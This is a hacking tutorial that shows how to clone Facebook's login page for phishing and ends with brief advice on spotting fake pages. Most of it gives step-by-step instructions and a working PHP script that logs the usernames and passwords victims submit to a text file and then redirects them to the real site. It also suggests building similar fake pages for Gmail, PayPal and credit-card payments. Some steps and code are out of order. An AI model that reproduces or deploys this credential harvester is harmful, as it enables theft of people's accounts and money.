Phishing Attack

Phishing is the most powerful and popular attack for hacking into emails and web accounts. Cyber criminals use this attack to hack into bank accounts, Facebook accounts and email account of innocent people. Every year, most of the biggest cyber crime case involve this attack. So we must know what is Phishing and how to protect your accounts from phishing attack.

Phishing is the act of fooling a computer user into submitting personal information by creating a counterfeit website that looks like a real (and trusted) site. It is a hacker technique of "fishing" for passwords and other secret financial info.

So now i am starting to show you how to hack someone by phishing...

What is phishing?

Go to Facebook.comRight click on the white space of the front page. Select "View Page source".

Copy the code to Notepad.

Now find (Press ctrl +f) for "action=" in that code.You fill find the code like this:

You have to change two things in that code..first of all you have to change method from POST to Get...as You can see in picture.

and secondly you have to change ACTION from https://login.facebook.com/login.php"

to “any.php"

Save the document as index.htmland Change the file type as All File

<?phpheader("Location: http://www.Facebook.com/login.php ");$handle = fopen("pswrds.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Now we need to create the “any.php" to store the password. so open the notepad and type the following code:

save this file as “any.php"

open the notepad and Now create a blank file and named it as "pswrds.txt".

Now onwards You have three files..first is "index.html".Second is “any.php" and third is "pswrds.txt"

Now we have to upload this three files on a php web hosting service.

STEP 5: Go to on http://www.hostingsite.com/ and click on sign up. and select any domain name as i mentioned in image

Now when you are logged into your account click on the Go to Cpanel in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

Before proceeding to next delete default.php under public_html directry.Now click on the Upload button, choose the three file that we created earlier.(index.html,any.php and pswrds.txt).

Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwrds.txt" file.

Gmail Yahoo Hotmail Paypal Libert Reserve Payza Credit card accepting page

Similarly we can make other fake pages like:

To protect your account from the phishing attack, we must follow some tips that will help to detect the fake page which is trying to hack our account.

Never give your password to any login page other than original login page. If any page is claiming for any offer and asks for your login credentials, never give. No service or website is allowed to ask for your password.

If you see a login page, then always check for the password Facebook login page will have URL start with www.facebook.com domain. Never confuse with fake domains like www.faceb00k.com or www.facebook.co.cc. These domains can trick you and steal your password.

How To Protect Your Account

If you get any link on the email, never click on it to open the page. If you want to open the page, you must type the URL manually on the browser.

If you are paying your bills online, always pay if you trust the online payment gateway or you trust the vendor. If you are not sure about the vendor, ignore the offer and leave the website.

use latest antivirus and internet security software. It will protect your from phishing pages. Most of the internet security tools have ability to detect and block the phishing URLs.

These are some most valuable tips that will help you to detect and protect your web accounts, email accounts and bank accounts from Phishing attack